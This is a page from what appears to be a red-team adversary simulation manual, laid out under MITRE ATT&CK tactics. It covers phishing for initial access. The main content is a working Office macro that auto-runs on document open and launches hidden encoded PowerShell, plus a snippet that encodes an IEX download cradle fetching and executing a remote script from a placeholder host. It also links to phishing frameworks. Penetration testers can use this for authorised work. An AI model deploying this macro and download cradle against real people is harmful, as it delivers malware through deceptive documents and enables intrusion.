Joined Adversary Simulation Manual
  • Joined Adversary Simulation Manual
  • Reconnaissance
    • Active Scanning
    • Gather Victim Host Information
    • Gather Victim Identity Information
    • Gather Victim Network Information
    • Gather Victim Org Information
    • Phishing for Information
    • Search Closed Sources
    • Search Open Technical Databases
    • Search Open Websites/Domains
    • Search Victim-Owned Websites
  • Resource Development
    • Acquire Infrastructure
    • Compromise Accounts
    • Compromise Infrastructure
    • Develop Capabilities
    • Establish Accounts
    • Obtain Capabilities
  • Initial Access
    • Drive-by Compromise
      • WiFi Attacks
    • Exploit Public-Facing Application
    • External Remote Services
    • Hardware Additions
    • Phishing
    • Replication Through Removable Media
    • Supply Chain Compromise
    • Trusted Relationship
    • Valid Accounts
  • Execution
    • Command and Scripting Interpreter
    • Exploitation for Client Execution
    • Inter-Process Communication
    • Native API
    • Scheduled Task-Job
    • Shared Modules
    • Software Deployment Tools
    • System Services
    • User Execution
    • Windows Management Instrumentation
  • Persistence
    • Account Manipulation
    • BITS Jobs
    • Boot or Logon Autostart Execution
    • Boot or Logon Initialization Scripts
    • Browser Extensions
    • Compromise Client Software Binary
    • Create Account
    • Create or Modify System Process
    • Event Triggered Execution
    • External Remote Services
    • Hijack Execution Flow
    • Implant Container Image
    • Office Application Startup
    • Pre-OS Boot
    • Scheduled Task-Job
    • Server Software Component
    • Traffic Signaling
    • Valid Accounts
  • Privilege Escalation
    • Abuse Elevation Control Mechanism
    • Access Token Manipulation
    • Boot or Logon Autostart Execution
    • Boot or Logon Initialization Scripts
    • Create or Modify System Process
    • Event Triggered Execution
    • Exploitation for Privilege Escalation
    • Group Policy Modification
    • Hijack Execution Flow
    • Scheduled Task-Job
    • Process Injection
    • Valid Accounts
  • Defense Evasion
    • Abuse Elevation Control Mechanism
    • Access Token Manipulation
    • BITS Jobs
    • Deobfuscate-Decode Files or Information
    • Direct Volume Access
    • Execution Guardrails
    • Exploitation for Defense Evasion
    • File and Directory Permissions Modification
    • Group Policy Modification
    • Hide Artifacts
    • Hijack Execution Flow
    • Impair Defenses
    • Indicator Removal on Host
    • Indirect Command Execution
    • Masquerading
    • Modify Authentication Process
    • Modify Cloud Compute Infrastructure
    • Modify Registry
    • Modify System Image
    • Network Boundary Bridging
    • Obfuscated Files or Information
    • Pre-OS Boot
    • Process Injection
    • Rogue Domain Controller
    • Rootkit
    • Signed Binary Proxy Execution
    • Signed Script Proxy Execution
    • Subvert Trust Controls
    • Template Injection
    • Traffic Signaling
    • Trusted Developer Utilities Proxy Execution
    • Unused-Unsupported Cloud Regions
    • Use Alternate Authentication Material
    • Valid Accounts
    • Virtualization-Sandbox Evasion
    • Weaken Encryption
    • XSL Script Processing
  • Credential Access
    • Brute Force
    • Credentials from Password Stores
    • Exploitation for Credential Access
    • Forced Authentication
    • Input Capture
    • Man-in-the-Middle
    • Modify Authentication Process
    • Network Sniffing
    • OS Credential Dumping
    • Steal Application Access Token
    • Steal or Forge Kerberos Tickets
    • Steal Web Session Cookie
    • Two-Factor Authentication Interception
    • Unsecured Credentials
  • Discovery
    • Account Discovery
    • Application Window Discovery
    • Browser Bookmark Discovery
    • Cloud Infrastructure Discovery
    • Cloud Service Dashboard
    • Cloud Service Discovery
    • Cloud Trust Discovery
    • Domain Trust Discovery
    • File and Directory Discovery
    • Network Service Scanning
    • Network Share Discovery
    • Network Sniffing
    • Password Policy Discovery
    • Peripheral Device Discovery
    • Permission Groups Discovery
    • Process Discovery
    • Query Registry
    • Remote System Discovery
    • Software Discovery
    • System Information Discovery
    • System Network Configuration Discovery
    • System Network Connections Discovery
    • System Owner-User Discovery
    • System Service Discovery
    • System Time Discovery
    • Virtualization-Sandbox Evasion
  • Lateral Movement
    • Exploitation of Remote Services
    • Internal Spearphishing
    • Lateral Tool Transfer
    • Remote Service Session Hijacking
    • Remote Services
    • Replication Through Removable Media
    • Software Deployment Tools
    • Taint Shared Content
    • Use Alternate Authentication Material
  • Collection
    • Archive Collected Data
    • Audio Capture
    • Automated Collection
    • Clipboard Data
    • Data from Cloud Storage Object
    • Data from Configuration Repository
    • Data from Information Repositories
    • Data from Local System
    • Data from Network Shared Drive
    • Data from Removable Media
    • Data Staged
    • Email Collection
    • Input Capture
    • Man in the Browser
    • Man-in-the-Middle
    • Screen Capture
    • Video Capture
  • Command and Control
    • Application Layer Protocol
    • Communication Through Removable Media
    • Data Encoding
    • Data Obfuscation
    • Dynamic Resolution
    • Encrypted Channel
    • Fallback Channels
    • Ingress Tool Transfer
    • Multi-Stage Channels
    • Non-Application Layer Protocol
    • Non-Standard Port
    • Protocol Tunneling
    • Proxy
    • Remote Access Software
    • Traffic Signaling
    • Web Service
  • Exfiltration
    • Automated Exfiltration
    • Data Transfer Size Limits
    • Exfiltration Over Web Service
    • Exfiltration Over Alternative Protocol
    • Exfiltration Over C2 Channel
    • Exfiltration Over Other Network Medium
    • Exfiltration Over Physical Medium
    • Exfiltration Over Web Service
    • Scheduled Transfer
    • Transfer Data to Cloud Account
  • Impact
    • Account Access Removal
    • Data Destruction
    • Data Encrypted for Impact
    • Data Manipulation
    • Defacement
    • Disk Wipe
    • Endpoint Denial of Service
    • Firmware Corruption
    • Inhibit System Recovery
    • Network Denial of Service
    • Resource Hijacking
    • Service Stop
    • System Shutdown-Reboot
  • General Pentesting
    • Services
    • SSL related Commands
    • Web useful commands
    • Reverse Shells
    • DB related Commands
    • VLAN Attacks
    • AD Bruteforcing
    • JWT Attacks
  • Tricks
  • Tools
    • AD Tools
    • Mobile Tools
    • Tools
    • WiFi Tools
    • LAN Tools
    • LAN Tools
  • Contributors
  • Kudos, References and Further Reading
Powered by GitBook
On this page
  • Spearphishing Attachment
  • Spearphishing Link
  • Spearphishing via Service

Was this helpful?

  1. Initial Access

Phishing

Spearphishing Attachment

Example Office macro:

Sub DoStuff()
    Dim wsh As Object
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run "powershell -Sta -Nop -Window Hidden -EncodedCommand <bla>"
    Set wsh = Nothing
End Sub

Sub AutoOpen()
    DoStuff
End Sub

To correctly base64 encode for PowerShell:

PS > $str = "IEX ((new-object net.webclient).downloadstring('http://ip/filename'))"
PS > [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

Spearphishing Link

Useful links:

  • https://github.com/gophish/gophish

  • https://github.com/kgretzky/evilginx2

Spearphishing via Service

PreviousHardware AdditionsNextReplication Through Removable Media

Last updated 4 years ago

Was this helpful?